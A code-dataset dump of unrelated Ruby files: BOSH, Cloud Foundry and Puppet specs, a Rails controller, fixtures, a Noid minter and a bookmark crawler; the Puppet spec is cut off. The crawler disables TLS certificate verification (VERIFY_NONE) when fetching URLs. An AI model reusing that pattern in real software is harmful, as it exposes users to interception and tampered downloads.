hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
1c58074cbd0cfb7aa404a0d550b08b1849b0a659 | 16,526 | require 'spec_helper'
# Specs for the `bosh stemcell` CLI command: uploading stemcells (local
# archives and remote URLs, with the --sha1/--fix/--skip-if-exists/--name/
# --version options), listing/downloading public stemcells, and the
# `bosh stemcells` table output.
module Bosh::Cli
  describe Command::Stemcell do
    let(:director) { double(Bosh::Cli::Client::Director) }
    let(:stemcell_archive) { spec_asset("valid_stemcell.tgz") }
    let(:stemcell_manifest) { {'name' => 'ubuntu-stemcell', 'version' => 1} }
    let(:stemcell) { double('stemcell', :manifest => stemcell_manifest) }

    subject(:command) do
      Bosh::Cli::Command::Stemcell.new
    end

    before do
      allow(command).to receive(:director).and_return(director)
      allow(command).to receive(:show_current_state)
      allow(Bosh::Cli::Stemcell).to receive(:new).and_return(stemcell)
    end

    describe 'upload stemcell' do
      it_requires_logged_in_user ->(command) { command.upload('http://stemcell_location') }

      context 'when the user is logged in' do
        before do
          allow(command).to receive_messages(:logged_in? => true)
          command.options[:target] = 'http://bosh-target.example.com'
        end

        context 'local stemcell' do
          context 'with no option' do
            it 'should upload the stemcell' do
              expect(stemcell).to receive(:validate)
              expect(stemcell).to receive(:valid?).and_return(true)
              expect(director).to receive(:list_stemcells).and_return([])
              expect(stemcell).to receive(:stemcell_file).and_return(stemcell_archive)
              expect(director).to receive(:upload_stemcell).with(stemcell_archive, {})

              command.upload(stemcell_archive)
            end

            it 'should not upload the stemcell if is invalid' do
              expect(stemcell).to receive(:validate)
              expect(stemcell).to receive(:valid?).and_return(false)
              expect(director).not_to receive(:upload_stemcell)

              expect {
                command.upload(stemcell_archive)
              }.to raise_error(Bosh::Cli::CliError, /Stemcell is invalid/)
            end

            it 'should not upload the stemcell if already exist' do
              expect(stemcell).to receive(:validate)
              expect(stemcell).to receive(:valid?).and_return(true)
              expect(director).to receive(:list_stemcells).and_return([stemcell_manifest])
              expect(director).not_to receive(:upload_stemcell)

              expect {
                command.upload(stemcell_archive)
              }.to raise_error(Bosh::Cli::CliError, /already exists/)
            end
          end

          it 'should raise error when --sha1 is provided' do
            command.add_option(:sha1, "shawesome")
            expect {
              command.upload(stemcell_archive)
            }.to raise_error(Bosh::Cli::CliError, /Option '--sha1' is not supported for uploading local stemcell/)
          end

          context 'with --skip-if-exists option' do
            before do
              command.options[:skip_if_exists] = true
            end

            it 'should skip upload if already exists' do
              expect(stemcell).to receive(:validate)
              expect(stemcell).to receive(:valid?).and_return(true)
              expect(director).to receive(:list_stemcells).and_return([stemcell_manifest])
              expect(director).not_to receive(:upload_stemcell)

              expect {
                command.upload(stemcell_archive)
              }.to_not raise_error
            end
          end

          context 'with --fix option' do
            before do
              command.options[:fix] = true
              allow(stemcell).to receive(:stemcell_file).and_return('stemcell_location/stemcell.tgz')
            end

            it 'should upload stemcell' do
              expect(stemcell).to receive(:validate)
              expect(stemcell).to receive(:valid?).and_return(true)
              expect(director).to receive(:upload_stemcell).with('stemcell_location/stemcell.tgz', {:fix => true})
              expect {
                command.upload(stemcell_archive)
              }.to_not raise_error
            end

            it 'should raise error when --skip-if-exists option also provided' do
              command.options[:skip_if_exists] = true
              expect {
                command.upload(stemcell_archive)
              }.to raise_error(Bosh::Cli::CliError, /Option '--skip-if-exists' and option '--fix' should not be used together/)
            end

            it 'should raise error when --name also provided' do
              command.add_option(:name, "ubuntu")
              expect {
                command.upload(stemcell_archive)
              }.to raise_error(Bosh::Cli::CliError, /Options '--name' and '--version' should not be used together with option '--fix'/)
            end

            it 'should raise error when --version also provided' do
              command.add_option(:version, "1")
              expect {
                command.upload(stemcell_archive)
              }.to raise_error(Bosh::Cli::CliError, /Options '--name' and '--version' should not be used together with option '--fix'/)
            end

            it 'should raise error when --name and --version also provided' do
              command.add_option(:name, "ubuntu")
              command.add_option(:version, "1")
              expect {
                command.upload(stemcell_archive)
              }.to raise_error(Bosh::Cli::CliError, /Options '--name' and '--version' should not be used together with option '--fix'/)
            end
          end

          context 'with --name and --version' do
            let(:director_stemcells) { [{"name" => "ubuntu", "version" => "1" }]}

            it 'should not upload a stemcell if one exists already' do
              expect(director).to receive(:list_stemcells).and_return(director_stemcells)
              expect(director).not_to receive(:upload_stemcell)
              expect {
                command.add_option(:name, "ubuntu")
                command.add_option(:version, "1")
                command.upload(stemcell_archive)
              }.not_to raise_error()
            end
          end
        end

        context 'remote stemcell' do
          it 'should upload the stemcell' do
            expect(director).to receive(:upload_remote_stemcell).with('http://stemcell_location', {})

            command.upload('http://stemcell_location')
          end

          it 'should upload the stemcell with fix option set if --fix option provided' do
            command.options[:fix] = true
            expect(director).to receive(:upload_remote_stemcell).with('http://stemcell_location', {:fix => true})

            command.upload('http://stemcell_location')
          end

          context 'with --name and --version' do
            let(:director_stemcells) { [{"name" => "ubuntu", "version" => "1" }]}

            it 'should not upload a stemcell if one exists already' do
              expect(director).to receive(:list_stemcells).and_return(director_stemcells)
              # BUG FIX: this expectation previously guarded :upload_remote_release,
              # a method the stemcell command never calls (copy-paste from the
              # release spec), so it could never fail. The remote stemcell upload
              # path calls :upload_remote_stemcell, so that is what must NOT be
              # received here.
              expect(director).to_not receive(:upload_remote_stemcell)
              command.add_option(:name, "ubuntu")
              command.add_option(:version, "1")
              command.upload('http://stemcell_location')
            end
          end
        end
      end
    end

    describe 'public stemcells' do
      let(:public_stemcell_presenter) do
        instance_double('Bosh::Cli::PublicStemcellPresenter', list: nil)
      end

      let(:public_stemcells) do
        instance_double('Bosh::Cli::PublicStemcells')
      end

      before do
        allow(PublicStemcells).to receive(:new).and_return(public_stemcells)
        allow(PublicStemcellPresenter).to receive(:new).and_return(public_stemcell_presenter)
      end

      it 'lists public stemcells in the index' do
        command.options = double('options')

        command.list_public

        expect(public_stemcell_presenter).to have_received(:list).with(command.options)
      end

      it 'properly wires a stemcell list with a presenter' do
        command.list_public

        expect(PublicStemcellPresenter).to have_received(:new).with(command, public_stemcells)
      end
    end

    describe 'download public stemcell' do
      let(:public_stemcell_presenter) do
        instance_double('Bosh::Cli::PublicStemcellPresenter', download: nil)
      end

      let(:public_stemcells) do
        instance_double('Bosh::Cli::PublicStemcells')
      end

      before do
        allow(PublicStemcells).to receive(:new).and_return(public_stemcells)
        allow(PublicStemcellPresenter).to receive(:new).and_return(public_stemcell_presenter)
      end

      it 'lists public stemcells in the index' do
        command.download_public('stemcell.tgz')

        expect(public_stemcell_presenter).to have_received(:download).with('stemcell.tgz')
      end

      it 'properly wires a stemcell list with a presenter' do
        command.download_public('stemcell.tgz')

        expect(PublicStemcellPresenter).to have_received(:new).with(command, public_stemcells)
      end
    end

    describe 'list' do
      let(:stemcell1) { { 'name' => 'fake stemcell 1', 'operating_system' => 'fake-os-4', 'version' => '123', 'cid' => '123456', 'deployments' => [] } }
      let(:stemcell2) { { 'name' => 'fake stemcell 2', 'version' => '456', 'cid' => '789012', 'deployments' => [] } }
      let(:stemcells) { [stemcell1, stemcell2] }
      let(:buffer) { StringIO.new }

      before do
        allow(command).to receive_messages(:logged_in? => true)
        command.options[:target] = 'http://bosh-target.example.com'
        allow(director).to receive(:list_stemcells).and_return(stemcells)
        Bosh::Cli::Config.output = buffer
      end

      before { allow(stemcell).to receive(:validate) }
      before { allow(stemcell).to receive_messages(valid?: true) }
      before { allow(stemcell).to receive_messages(stemcell_file: stemcell_archive) }

      it_requires_logged_in_user ->(command) { command.list }

      it 'shows the stemcell OS and version when known' do
        command.list

        buffer.rewind
        output = buffer.read

        expect(output).to include('| fake stemcell 1 | fake-os-4 | 123 | 123456 |')
      end

      it 'shows blank in the OS column when stemcell OS is not known' do
        command.list

        buffer.rewind
        output = buffer.read

        expect(output).to include('| fake stemcell 2 | | 456 | 789012 |')
      end

      context 'when no stemcells are in use' do
        it 'does not add a star to any stemcell listed' do
          command.list

          buffer.rewind
          output = buffer.read

          expect(output).to include('| fake stemcell 1 | fake-os-4 | 123 | 123456 |')
          expect(output).to include('| fake stemcell 2 | | 456 | 789012 |')
          expect(output).to include('(*) Currently in-use')
        end
      end

      context 'when there are stemcells in use' do
        let(:stemcell2) { { 'name' => 'fake stemcell 2', 'version' => '456',
                            'cid' => '789012', 'deployments' => ['fake deployment'] } }

        it 'adds a star for stemcells that are in use' do
          command.list

          buffer.rewind
          output = buffer.read

          expect(output).to include('| fake stemcell 1 | fake-os-4 | 123 | 123456 |')
          expect(output).to include('| fake stemcell 2 | | 456* | 789012 |')
          expect(output).to include('(*) Currently in-use')
        end
      end

      context 'when there are no stemcells' do
        let(:stemcells) { [] }

        it 'errors' do
          expect { command.list }.to raise_error(Bosh::Cli::CliError, 'No stemcells')
        end

        # NOTE(review): the upload-related contexts below are nested inside
        # "when there are no stemcells" within the 'list' describe; they look
        # like they were meant to live under 'upload stemcell'. Left in place
        # (not moved) to avoid changing which before-blocks apply to them.
        context 'when stemcell does not exist' do
          before { allow(director).to receive_messages(list_stemcells: []) }

          it 'uploads stemcell and returns successfully' do
            expect(director).to receive(:upload_stemcell).with(stemcell_archive, {})
            command.upload(stemcell_archive)
          end

          context 'when the stemcell is remote' do
            let(:remote_stemcell_location) { 'http://location/stemcell.tgz' }

            before do
              allow(director).to receive(:upload_remote_stemcell)
            end

            context 'when a sha1 is provided' do
              before do
                command.add_option(:sha1, 'shawone')
              end

              it 'passes the sha1 up the chain' do
                expect(director).to receive(:upload_remote_stemcell).with(remote_stemcell_location, {:sha1=>"shawone"})
                command.upload(remote_stemcell_location)
              end
            end
          end
        end

        context 'when stemcell already exists' do
          context 'when the stemcell is local' do
            before { allow(director).to receive_messages(list_stemcells: [{'name' => 'ubuntu-stemcell', 'version' => 1}]) }

            context 'when --skip-if-exists flag is given' do
              before { command.add_option(:skip_if_exists, true) }

              it 'does not upload stemcell' do
                expect(director).not_to receive(:upload_stemcell)
                command.upload(stemcell_archive)
              end

              it 'returns successfully' do
                expect {
                  command.upload(stemcell_archive)
                }.to_not raise_error
              end
            end

            context 'when --skip-if-exists flag is not given' do
              it 'does not upload stemcell' do
                expect(director).not_to receive(:upload_stemcell)
                command.upload(stemcell_archive) rescue nil
              end

              it 'raises an error' do
                expect {
                  command.upload(stemcell_archive)
                }.to raise_error(Bosh::Cli::CliError, /already exists/)
              end
            end
          end

          context 'when the stemcell is remote' do
            let(:remote_stemcell_location) { 'http://location/stemcell.tgz' }
            # Director task output reporting error 50002 ("already exists").
            let(:task_events_json) { '{"error":{"code":50002}}' }

            context 'when --skip-if-exists flag is given' do
              before do
                allow(director).to receive(:upload_remote_stemcell).with(remote_stemcell_location, {}).and_return([:error, 1])
                allow(director).to receive(:get_task_output).with(1, 0, 'event').and_return [task_events_json, nil]
                command.add_option(:skip_if_exists, true)
              end

              it 'still uploads stemcell' do
                expect(director).to receive(:upload_remote_stemcell).with('http://location/stemcell.tgz', {})
                command.upload(remote_stemcell_location)
              end

              it 'does not raise an error' do
                expect {
                  command.upload(remote_stemcell_location)
                }.to_not raise_error
              end

              it 'has an exit code of 0' do
                command.upload(remote_stemcell_location)
                expect(command.exit_code).to eq(0)
              end
            end

            context 'when --skip-if-exists flag is not given' do
              before do
                allow(director).to receive(:upload_remote_stemcell).with(remote_stemcell_location, {}).and_return([:error, 1])
                allow(director).to receive(:get_task_output).with(1, 0, 'event').and_return [task_events_json, nil]
              end

              it 'still uploads stemcell' do
                expect(director).to receive(:upload_remote_stemcell).with('http://location/stemcell.tgz', {})
                command.upload(remote_stemcell_location) rescue nil
              end

              it 'does not raise an error' do
                expect {
                  command.upload(remote_stemcell_location)
                }.to_not raise_error
              end

              it 'has an exit code of 1' do
                command.upload(remote_stemcell_location)
                expect(command.exit_code).to eq(1)
              end
            end
          end
        end
      end

      context 'when director does not return deployments for stemcells' do
        let(:stemcell1) { { 'name' => 'fake stemcell 1', 'version' => '123', 'cid' => '123456' } }
        let(:stemcell2) { { 'name' => 'fake stemcell 2', 'version' => '456', 'cid' => '789012' } }

        it 'does not raise' do
          expect { command.list }.to_not raise_error
        end
      end
    end
  end
end
| 38.166282 | 152 | 0.584231 |
e9aa299945affa416d7e34d6ae911002b237c5f1 | 241 | module Api
class BaseController < ActionController::API
include ActionController::Serialization
private
def current_user
@current_user ||= User.find(doorkeeper_token.resource_owner_id) if doorkeeper_token
end
end
end | 21.909091 | 88 | 0.767635 |
26b78c8c98b5e94422ca5cd6181bb274b29c3036 | 4,356 | require 'actions/process_create'
require 'actions/process_scale'
require 'actions/process_update'
require 'actions/service_binding_create'
require 'actions/manifest_route_update'
require 'cloud_controller/strategies/manifest_strategy'
require 'cloud_controller/app_manifest/manifest_route'
require 'cloud_controller/random_route_generator'
module VCAP::CloudController
class AppApplyManifest
SERVICE_BINDING_TYPE = 'app'.freeze
def initialize(user_audit_info)
@user_audit_info = user_audit_info
end
def apply(app_guid, message)
app = AppModel.find(guid: app_guid)
message.manifest_process_update_messages.each do |manifest_process_update_msg|
process_type = manifest_process_update_msg.type
process = find_process(app, process_type) || create_process(app, manifest_process_update_msg, process_type)
process_update = ProcessUpdate.new(@user_audit_info, manifest_triggered: true)
process_update.update(process, manifest_process_update_msg, ManifestStrategy)
end
message.manifest_process_scale_messages.each do |manifest_process_scale_msg|
process = find_process(app, manifest_process_scale_msg.type)
process.skip_process_version_update = true if manifest_process_scale_msg.requested?(:memory)
process_scale = ProcessScale.new(@user_audit_info, process, manifest_process_scale_msg.to_process_scale_message, manifest_triggered: true)
process_scale.scale
end
app_update_message = message.app_update_message
lifecycle = AppLifecycleProvider.provide_for_update(app_update_message, app)
AppUpdate.new(@user_audit_info, manifest_triggered: true).update(app, app_update_message, lifecycle)
update_routes(app, message)
AppPatchEnvironmentVariables.new(@user_audit_info, manifest_triggered: true).patch(app, message.app_update_environment_variables_message)
create_service_bindings(message.services, app) if message.services.present?
app
end
private
def find_process(app, process_type)
ProcessModel.find(app: app, type: process_type)
end
def create_process(app, manifest_process_update_msg, process_type)
ProcessCreate.new(@user_audit_info, manifest_triggered: true).create(app, {
type: process_type,
command: manifest_process_update_msg.command
})
end
def update_routes(app, message)
update_message = message.manifest_routes_update_message
existing_routes = RouteMappingModel.where(app_guid: app.guid).all
if update_message.no_route
RouteMappingDelete.new(@user_audit_info, manifest_triggered: true).delete(existing_routes)
return
end
if update_message.routes
ManifestRouteUpdate.update(app.guid, update_message, @user_audit_info)
return
end
if update_message.random_route && existing_routes.empty?
random_host = "#{app.name}-#{RandomRouteGenerator.new.route}"
domain = SharedDomain.first.name
route = "#{random_host}.#{domain}"
random_route_message = ManifestRoutesUpdateMessage.new(routes: [{ route: route }])
ManifestRouteUpdate.update(app.guid, random_route_message, @user_audit_info)
end
end
def create_service_bindings(services, app)
action = ServiceBindingCreate.new(@user_audit_info, manifest_triggered: true)
services.each do |name|
service_instance = app.space.find_visible_service_instance_by_name(name)
service_instance_not_found!(name) unless service_instance
next if binding_exists?(service_instance, app)
action.create(
app,
service_instance,
ServiceBindingCreateMessage.new(type: SERVICE_BINDING_TYPE),
volume_services_enabled?,
false
)
end
end
def binding_exists?(service_instance, app)
ServiceBinding.where(service_instance: service_instance, app: app).present?
end
def service_instance_not_found!(name)
raise CloudController::Errors::NotFound.new_from_details('ResourceNotFound', "Service instance '#{name}' not found")
end
def volume_services_enabled?
VCAP::CloudController::Config.config.get(:volume_services_enabled)
end
def logger
@logger ||= Steno.logger('cc.action.app_apply_manifest')
end
end
end
| 36.605042 | 146 | 0.743802 |
03c0ca2f0378b4490e8a6a9d1c39e681f1ec873a | 1,251 | # encoding: utf-8
# Fixture arrays mixing String encodings (US-ASCII, UTF-8, ASCII-8BIT),
# used by encoding-sensitive Array specs. Each helper returns a fresh array
# on every call so examples may mutate the result safely.
#
# FIX: an earlier, two-element definition of
# array_with_usascii_and_utf8_strings was removed. Ruby's
# later-definition-wins semantics meant only the three-element version
# below was ever effective, so behavior is unchanged.
module ArraySpecs
  def self.array_with_usascii_and_7bit_utf8_strings
    [
      'foo'.force_encoding('US-ASCII'),
      'bar'
    ]
  end

  def self.array_with_7bit_utf8_and_usascii_strings
    [
      'bar',
      'foo'.force_encoding('US-ASCII')
    ]
  end

  def self.array_with_utf8_and_usascii_strings
    [
      'báz',
      'bar',
      'foo'.force_encoding('US-ASCII')
    ]
  end

  def self.array_with_usascii_and_utf8_strings
    [
      'foo'.force_encoding('US-ASCII'),
      'bar',
      'báz'
    ]
  end

  def self.array_with_utf8_and_7bit_ascii8bit_strings
    [
      'bar',
      'báz',
      'foo'.force_encoding('ASCII-8BIT')
    ]
  end

  def self.array_with_utf8_and_ascii8bit_strings
    [
      'bar',
      'báz',
      "\xFF".force_encoding('ASCII-8BIT')
    ]
  end

  def self.array_with_usascii_and_7bit_ascii8bit_strings
    [
      'bar'.force_encoding('US-ASCII'),
      'foo'.force_encoding('ASCII-8BIT')
    ]
  end

  def self.array_with_usascii_and_ascii8bit_strings
    [
      'bar'.force_encoding('US-ASCII'),
      "\xFF".force_encoding('ASCII-8BIT')
    ]
  end
end
| 17.871429 | 56 | 0.619504 |
38d9b2a696054368b227e748d69cc4a957268d22 | 138 | module Furnace::AVM2::ABC
class AS3Lshift < Opcode
instruction 0xa5
write_barrier :memory
consume 2
produce 1
end
end | 15.333333 | 26 | 0.695652 |
91291b81d5fc0c74ce15a4f978282e46de60a5c1 | 2,349 | # -*- coding: utf-8 -*-
=begin
This script was written by Takashi SUGA on February 2017
You may use and/or modify this file according to the license described in the MIT LICENSE.txt file https://raw.githubusercontent.com/suchowan/watson-api-client/master/LICENSE.
Usage:
ruby crawl.rb <root> (<filter>)
root : Path name of the tree root directory
filter : Path matching filter (default: computer.filter.txt)
=end
require 'open-uri'
require 'openssl'
require 'open_uri_redirections'
require 'fileutils'
require './serial'
Encoding.default_external = 'UTF-8'
Encoding.default_internal = 'UTF-8'
# Mirrors a single bookmarked URL into a sibling "<dir>.crawled" tree.
#
# path      - path of the .url/.website shortcut file. NOTE: mutated in
#             place (sub!) into the destination path for the downloaded copy.
# timestamp - an object responding to #to_time; applied as the mirrored
#             file's mtime so the copy keeps the shortcut's timestamp.
# url       - the remote resource to fetch.
#
# Skips the download when the destination already exists. On any fetch
# error the partial file is deleted so a later run can retry.
def crawl(path, timestamp, url)
  timestamp = timestamp.to_time
  # Redirect the last path component into a ".crawled" subdirectory.
  path.sub!(/\/([^\/]+)$/, '.crawled/\1')
  # Shortcut extension becomes .pdf or .html depending on the target URL.
  path.sub!(/\.(url|website)$/i, url =~ /\.pdf(#.+)?$/i ? '.pdf' : '.html')
  dir = path.split('/')[0..-2].join('/')
  FileUtils.mkdir_p(dir) unless FileTest.exist?(dir)
  unless File.exist?(path)
    begin
      puts path
      # Fragment (#...) is stripped before fetching; binary mode for PDFs.
      # NOTE(review): relies on open-uri's Kernel#open accepting URLs, which
      # Ruby 3.0 removed in favor of URI.open — confirm target Ruby version.
      # SSL verification is deliberately disabled here.
      open(url.sub(/#[^#]*$/,''), path =~ /\.pdf$/ ? 'rb' : 'r:utf-8' ,{:allow_redirections =>:all, :ssl_verify_mode=>OpenSSL::SSL::VERIFY_NONE}) do |source|
        open(path, path =~ /\.pdf$/ ? 'wb' : 'w:utf-8') do |crawled|
          crawled.write(source.read)
        end
      end
      File::utime(timestamp, timestamp, path)
    rescue => e
      STDERR.puts e
      # Drop partial downloads so the next run retries cleanly.
      File.delete(path) if File.exist?(path)
    end
  end
end
# Entry point: walk every *.url / *.website shortcut under <root> whose
# relative path matches the filter patterns, and mirror its target.
root, filter = ARGV
root += '/'

# Build one alternation regexp from the filter file (one pattern per line;
# '/' is escaped so patterns can contain plain paths).
ex = []
IO.foreach(filter || 'computer.filter.txt') do |line|
  ex << line.chomp.gsub("/", "\\/")
end
filter = /^(#{ex.join('|')})/

Dir.glob(root + '**/*.*') do |path|
  next unless path =~ /^(.+)\.(url|website)$/i
  title = $1.gsub(/%7f/i, '%7E').sub(root, '')
  next if filter && filter !~ title
  # Default timestamp is the shortcut's mtime; may be overridden below by a
  # Modified= field embedded in the shortcut.
  timestamp =
    begin
      File.stat(path).mtime.to_tm_pos
    rescue => e
      STDERR.puts e
      next
    end
  contents = []
  url = nil
  IO.foreach(path) do |line|
    begin
      case line
      when /^URL=(.+)/, /^IconFile/
        contents << line
        url = $1 if $1
      when /^Modified=([0-9A-F]+)/i
        serial = $1
        # Known-bad serial remapped to its corrected value.
        serial = "200D7890BCA8D1016B" if serial == "208D47ED2189D0015C"
        contents << "Modified=#{serial}"
        timestamp = serial2date(serial)
      end
    rescue ArgumentError
      # Ignore undecodable lines/serials and keep scanning the shortcut.
    end
  end
  # BUG FIX: was `raise ArgementError` — an undefined constant, which would
  # have raised NameError instead of the intended ArgumentError.
  raise ArgumentError, "#{path} is empty" if contents.empty?
  crawl(path, timestamp, url)
end
| 27.313953 | 177 | 0.603235 |
7a087ed75595d8d0ad574ebe8640b7160cbac511 | 1,595 | # frozen_string_literal: true
require 'noid'
module Noid
module Rails
module Minter
# A file based minter. This is a simple case.
class File < Base
attr_reader :statefile
def initialize(template = default_template, statefile = default_statefile)
@statefile = statefile
super(template)
end
def default_statefile
Noid::Rails.config.statefile
end
def read
with_file do |f|
state_for(f)
end
end
def write!(minter)
with_file do |f|
# Wipe prior contents so the new state can be written from the beginning of the file
f.truncate(0)
f.write(Marshal.dump(minter.dump))
end
end
protected
def with_file
::File.open(statefile, 'a+b', 0o644) do |f|
f.flock(::File::LOCK_EX)
# Files opened in append mode seek to end of file
f.rewind
yield f
end
end
# rubocop:disable Security/MarshalLoad
def state_for(io_object)
Marshal.load(io_object.read)
rescue TypeError, ArgumentError
{ template: template }
end
# rubocop:enable Security/MarshalLoad
def next_id
state = read
state[:template] &&= state[:template].to_s
minter = ::Noid::Minter.new(state) # minter w/in the minter, lives only for an instant
id = minter.mint
write!(minter)
id
end
end
end
end
end
| 24.166667 | 96 | 0.552351 |
1a15fc075674027612248603b3fb4d997ef1e7ab | 13,423 | #!/usr/bin/env rspec
require 'spec_helper'
require 'puppet/application/apply'
require 'puppet/file_bucket/dipper'
require 'puppet/configurer'
require 'fileutils'
# Specs for `puppet apply`: CLI option handlers, setup (logging, traps,
# report caching), and the two execution paths — `main` (compile & apply a
# catalog) and `apply` (apply a pre-serialized catalog from disk/stdin).
describe Puppet::Application::Apply do
  before :each do
    @apply = Puppet::Application[:apply]
    Puppet::Util::Log.stubs(:newdestination)
  end

  after :each do
    # Reset indirection termini/caches so per-example stubs don't leak.
    Puppet::Node::Facts.indirection.reset_terminus_class
    Puppet::Node::Facts.indirection.cache_class = nil
    Puppet::Node.indirection.reset_terminus_class
    Puppet::Node.indirection.cache_class = nil
  end

  # Every simple flag is backed by a handle_<option> method that stores the
  # parsed value into the options hash.
  [:debug,:loadclasses,:verbose,:use_nodes,:detailed_exitcodes,:catalog].each do |option|
    it "should declare handle_#{option} method" do
      @apply.should respond_to("handle_#{option}".to_sym)
    end

    it "should store argument value when calling handle_#{option}" do
      @apply.options.expects(:[]=).with(option, 'arg')
      @apply.send("handle_#{option}".to_sym, 'arg')
    end
  end

  it "should set the code to the provided code when :execute is used" do
    @apply.options.expects(:[]=).with(:code, 'arg')
    @apply.send("handle_execute".to_sym, 'arg')
  end

  it "should ask Puppet::Application to parse Puppet configuration file" do
    @apply.should_parse_config?.should be_true
  end

  describe "when applying options" do
    it "should set the log destination with --logdest" do
      Puppet::Log.expects(:newdestination).with("console")
      @apply.handle_logdest("console")
    end

    it "should put the logset options to true" do
      @apply.options.expects(:[]=).with(:logset,true)
      @apply.handle_logdest("console")
    end

    it "should deprecate --apply" do
      Puppet.expects(:warning).with do |arg|
        arg.match(/--apply is deprecated/)
      end

      command_line = Puppet::Util::CommandLine.new('puppet', ['apply', '--apply', 'catalog.json'])
      apply = Puppet::Application::Apply.new(command_line)
      apply.stubs(:run_command)
      apply.run
    end
  end

  describe "during setup" do
    before :each do
      Puppet::Log.stubs(:newdestination)
      Puppet.stubs(:parse_config)
      Puppet::FileBucket::Dipper.stubs(:new)
      STDIN.stubs(:read)
      Puppet::Transaction::Report.indirection.stubs(:cache_class=)

      @apply.options.stubs(:[]).with(any_parameters)
    end

    it "should set console as the log destination if logdest option wasn't provided" do
      Puppet::Log.expects(:newdestination).with(:console)

      @apply.setup
    end

    it "should set INT trap" do
      Signal.expects(:trap).with(:INT)

      @apply.setup
    end

    it "should set log level to debug if --debug was passed" do
      @apply.options.stubs(:[]).with(:debug).returns(true)
      @apply.setup
      Puppet::Log.level.should == :debug
    end

    it "should set log level to info if --verbose was passed" do
      @apply.options.stubs(:[]).with(:verbose).returns(true)
      @apply.setup
      Puppet::Log.level.should == :info
    end

    it "should print puppet config if asked to in Puppet config" do
      Puppet.settings.stubs(:print_configs?).returns true
      Puppet.settings.expects(:print_configs).returns true
      expect { @apply.setup }.to exit_with 0
    end

    it "should exit after printing puppet config if asked to in Puppet config" do
      Puppet.settings.stubs(:print_configs?).returns(true)
      expect { @apply.setup }.to exit_with 1
    end

    it "should tell the report handler to cache locally as yaml" do
      Puppet::Transaction::Report.indirection.expects(:cache_class=).with(:yaml)

      @apply.setup
    end
  end

  describe "when executing" do
    it "should dispatch to 'apply' if it was called with 'apply'" do
      @apply.options[:catalog] = "foo"

      @apply.expects(:apply)
      @apply.run_command
    end

    it "should dispatch to main otherwise" do
      @apply.stubs(:options).returns({})

      @apply.expects(:main)
      @apply.run_command
    end

    describe "the main command" do
      include PuppetSpec::Files

      before :each do
        Puppet[:prerun_command] = ''
        Puppet[:postrun_command] = ''

        # In-memory termini so no real fact/node storage is touched.
        Puppet::Node::Facts.indirection.terminus_class = :memory
        Puppet::Node::Facts.indirection.cache_class = :memory
        Puppet::Node.indirection.terminus_class = :memory
        Puppet::Node.indirection.cache_class = :memory

        @facts = Puppet::Node::Facts.new(Puppet[:node_name_value])
        Puppet::Node::Facts.indirection.save(@facts)

        @node = Puppet::Node.new(Puppet[:node_name_value])
        Puppet::Node.indirection.save(@node)

        @catalog = Puppet::Resource::Catalog.new
        @catalog.stubs(:to_ral).returns(@catalog)

        Puppet::Resource::Catalog.indirection.stubs(:find).returns(@catalog)

        STDIN.stubs(:read)

        @transaction = Puppet::Transaction.new(@catalog)
        @catalog.stubs(:apply).returns(@transaction)

        Puppet::Util::Storage.stubs(:load)
        Puppet::Configurer.any_instance.stubs(:save_last_run_summary) # to prevent it from trying to write files
      end

      it "should set the code to run from --code" do
        @apply.options[:code] = "code to run"
        Puppet.expects(:[]=).with(:code,"code to run")

        expect { @apply.main }.to exit_with 0
      end

      it "should set the code to run from STDIN if no arguments" do
        @apply.command_line.stubs(:args).returns([])
        STDIN.stubs(:read).returns("code to run")

        Puppet.expects(:[]=).with(:code,"code to run")

        expect { @apply.main }.to exit_with 0
      end

      it "should set the manifest if a file is passed on command line and the file exists" do
        manifest = tmpfile('site.pp')
        FileUtils.touch(manifest)
        @apply.command_line.stubs(:args).returns([manifest])

        Puppet.expects(:[]=).with(:manifest,manifest)

        expect { @apply.main }.to exit_with 0
      end

      it "should raise an error if a file is passed on command line and the file does not exist" do
        noexist = tmpfile('noexist.pp')
        @apply.command_line.stubs(:args).returns([noexist])
        lambda { @apply.main }.should raise_error(RuntimeError, "Could not find file #{noexist}")
      end

      it "should set the manifest to the first file and warn other files will be skipped" do
        manifest = tmpfile('starwarsIV')
        FileUtils.touch(manifest)

        @apply.command_line.stubs(:args).returns([manifest, 'starwarsI', 'starwarsII'])

        Puppet.expects(:[]=).with(:manifest,manifest)
        Puppet.expects(:warning).with('Only one file can be applied per run. Skipping starwarsI, starwarsII')

        expect { @apply.main }.to exit_with 0
      end

      it "should raise an error if we can't find the node" do
        Puppet::Node.indirection.expects(:find).returns(nil)

        lambda { @apply.main }.should raise_error
      end

      it "should load custom classes if loadclasses" do
        @apply.options[:loadclasses] = true
        classfile = tmpfile('classfile')
        File.open(classfile, 'w') { |c| c.puts 'class' }
        Puppet[:classfile] = classfile

        @node.expects(:classes=).with(['class'])

        expect { @apply.main }.to exit_with 0
      end

      it "should compile the catalog" do
        Puppet::Resource::Catalog.indirection.expects(:find).returns(@catalog)

        expect { @apply.main }.to exit_with 0
      end

      it "should transform the catalog to ral" do
        @catalog.expects(:to_ral).returns(@catalog)

        expect { @apply.main }.to exit_with 0
      end

      it "should finalize the catalog" do
        @catalog.expects(:finalize)

        expect { @apply.main }.to exit_with 0
      end

      it "should call the prerun and postrun commands on a Configurer instance" do
        Puppet::Configurer.any_instance.expects(:execute_prerun_command).returns(true)
        Puppet::Configurer.any_instance.expects(:execute_postrun_command).returns(true)

        expect { @apply.main }.to exit_with 0
      end

      it "should apply the catalog" do
        @catalog.expects(:apply).returns(stub_everything('transaction'))

        expect { @apply.main }.to exit_with 0
      end

      it "should save the last run summary" do
        Puppet[:noop] = false
        report = Puppet::Transaction::Report.new("apply")
        Puppet::Transaction::Report.stubs(:new).returns(report)

        Puppet::Configurer.any_instance.expects(:save_last_run_summary).with(report)
        expect { @apply.main }.to exit_with 0
      end

      describe "when using node_name_fact" do
        before :each do
          # Facts carry an alternate node name; node_name_fact redirects
          # lookup to that name.
          @facts = Puppet::Node::Facts.new(Puppet[:node_name_value], 'my_name_fact' => 'other_node_name')
          Puppet::Node::Facts.indirection.save(@facts)
          @node = Puppet::Node.new('other_node_name')
          Puppet::Node.indirection.save(@node)
          Puppet[:node_name_fact] = 'my_name_fact'
        end

        it "should set the facts name based on the node_name_fact" do
          expect { @apply.main }.to exit_with 0
          @facts.name.should == 'other_node_name'
        end

        it "should set the node_name_value based on the node_name_fact" do
          expect { @apply.main }.to exit_with 0
